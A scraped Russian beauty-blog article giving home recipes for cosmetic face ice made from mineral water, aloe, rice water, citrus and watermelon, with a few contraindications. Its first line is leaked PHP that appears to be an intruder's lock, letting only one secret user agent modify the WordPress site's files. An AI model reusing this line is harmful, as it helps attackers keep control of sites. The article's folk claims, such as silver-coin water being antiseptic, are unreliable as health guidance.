if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепты изготовления косметического льда | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепты изготовления косметического льда

Лед имеет тонизирующее свойство и это бесплатная косметика для красоты. Если использовать лед утром, организм быстрее просыпается и кожа лица приобретает свежий вид.

Лед име­ет тони­зи­ру­ю­щее свой­ство и это бес­плат­ная кос­ме­ти­ка для кра­со­ты. Если исполь­зо­вать лед утром, орга­низм быст­рее про­сы­па­ет­ся и кожа лица при­об­ре­та­ет све­жий вид. Лед мгно­вен­но воз­дей­ству­ет на эпи­дер­мис, кровь вне­зап­но при­ли­ва­ет к верх­не­му слою кожи, поры сужа­ют­ся и начи­на­ют дей­ство­вать обмен­ные про­цес­сы. В резуль­та­те мож­но полу­чить не толь­ко эла­стич­ную кожу, но и неж­ный румя­нец на щеках.

Ко все­му про­ти­рать льдом мож­но не толь­ко лицо, но и область деколь­те и шеи. Для луч­ше­го эффек­та про­це­ду­ру про­во­дить сле­ду­ет два­жды в день. Лед дол­жен сколь­зить по коже в доволь­но быст­ром тем­пе и не задер­жи­вать­ся на отдель­ных участ­ках. Что­бы такая про­це­ду­ра при­нес­ла боль­ше поль­зы, не сто­ит сра­зу выти­рать лицо поло­тен­цем, надо дать высох­нуть воде само­сто­я­тель­но. Так кожа погло­тит все полез­ные веще­ства, зало­жен­ные во льду, ведь суще­ству­ет мно­го рецеп­тов для при­го­тов­ле­ния кос­ме­ти­че­ско­го льда.

Ингредиенты для косметического льда

2Лед из мине­раль­ной воды наи­бо­лее поле­зен для кожи лица. Для это­го потре­бу­ет­ся залить в фор­мы мине­раль­ную воду и замо­ро­зить. Все пита­тель­ные веще­ства, кото­рые содер­жат­ся в воде, будут сохра­не­ны. Такой лед могут исполь­зо­вать все без исклю­че­ния, ведь он под­хо­дит для всех типов кожи. Тони­зи­ру­ю­щим свой­ством обла­да­ет зеле­ный чай, неза­ви­си­мо от типа кожи.

А вот сок алоэ помо­жет тем, кто стра­да­ет угря­ми и раз­дра­жен­ной кожей. Рецепт при­го­тов­ле­ния тако­го льда доста­точ­но про­стой. Сле­ду­ет взять толь­ко сорван­ные листья алоэ и поло­жить их в холо­диль­ник на 11 дней, а затем надо выжать с них сок. Допол­ни­тель­но необ­хо­ди­мо при­го­то­вить пол­ста­ка­на настоя шал­фея и сме­шать его с 3 лож­ка­ми сока алоэ. Тща­тель­но пере­ме­шать и раз­лить в фор­мы для льда. Поми­мо алоэ, от угрей помо­жет лед с отва­ром ромаш­ки или чистотела.

В древ­ние вре­ме­на, для оздо­ров­ле­ния кожи, жен­щи­ны поль­зо­ва­лись сереб­ря­ным льдом. Как извест­но, сереб­ро соче­та­ет в себе анти­сеп­ти­че­ские и очи­ща­ю­щие свой­ства. Для это­го бра­ли моне­ту и бро­са­ли ее в воду на сут­ки и с этой воды дела­ли лед.Рецепты косметического

Людям, име­ю­щие пиг­мент­ные пят­на, помо­жет лед из рисо­во­го отва­ра, кото­рый отбе­ли­ва­ет кожу. Сле­ду­ет про­мыть рис и про­ва­рить его в боль­шом коли­че­стве воды. После того, как рис раз­ва­рит­ся, его нуж­но высы­пать в сито, а полу­чен­ный отвар замо­ро­зить в моро­зил­ке. Такой лед мож­но исполь­зо­вать в тече­ние 3 дней.

Так­же мож­но сде­лать лед по еще одно­му рецеп­ту с отва­ра от лав­ро­во­го листа. Такое сред­ство хоро­шо успо­ко­ит кожу лица после чист­ки лица.

 Фруктовый лед

kosmetik-led3

Замо­ро­жен­ный сок цит­ру­со­вых, в осо­бен­но­сти лимо­на, борет­ся с при­зна­ка­ми ста­ре­ния на лице и явля­ет­ся отбе­ли­ва­ю­щим сред­ством. Что­бы сде­лать омо­ла­жи­ва­ю­щий лед, необ­хо­ди­мо взять све­жее выжа­тый сок с поло­ви­ны лимо­на и раз­ве­сти его в ста­кане про­хлад­ной кипя­че­ной воды. После это­го мож­но раз­лить в фор­мы и отпра­вить в моро­зиль­ную камеру.

Грейп­фрут явля­ет­ся не менее эффек­тив­ным сред­ством по срав­не­нию с лимо­ном. Плод надо наре­зать доль­ка­ми, очи­стить и в таком виде замо­ро­зить. Кожу лица сто­ит про­ти­рать имен­но его доль­ка­ми и не смы­вать сок на про­тя­же­нии 15 минут. А вме­сто тони­ка реко­мен­ду­ет­ся исполь­зо­вать лед с мяко­ти арбу­за. Надо лишь запол­нить ею фор­мы для льда и заморозить.

Суще­ству­ет огром­ное коли­че­ство рецеп­тов, как при­го­то­вить кос­ме­ти­че­ский лед в домаш­них усло­ви­ях. Но и здесь суще­ству­ют про­ти­во­по­ка­за­ния для при­ме­не­ния. К при­ме­ру, не сто­ит увле­кать­ся льдом людям, кото­рые име­ют рас­ши­рен­ные сосу­ды или вос­па­ле­ния кожи. Нали­чие откры­тых ран так­же не при­не­сет поль­зы, а толь­ко вред. Кате­го­ри­че­ски запре­ще­но про­во­дить про­це­ду­ры с исполь­зо­ва­ни­ем льда, перед выхо­дом на ули­цу в холод­ное вре­мя года.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Лиана Сергеевна

Так мерзну осенью и зимой, что очень захотелось поделиться с вами рецептами домашней косметики, которую можно сделать своими руками! Читайте все мои записи!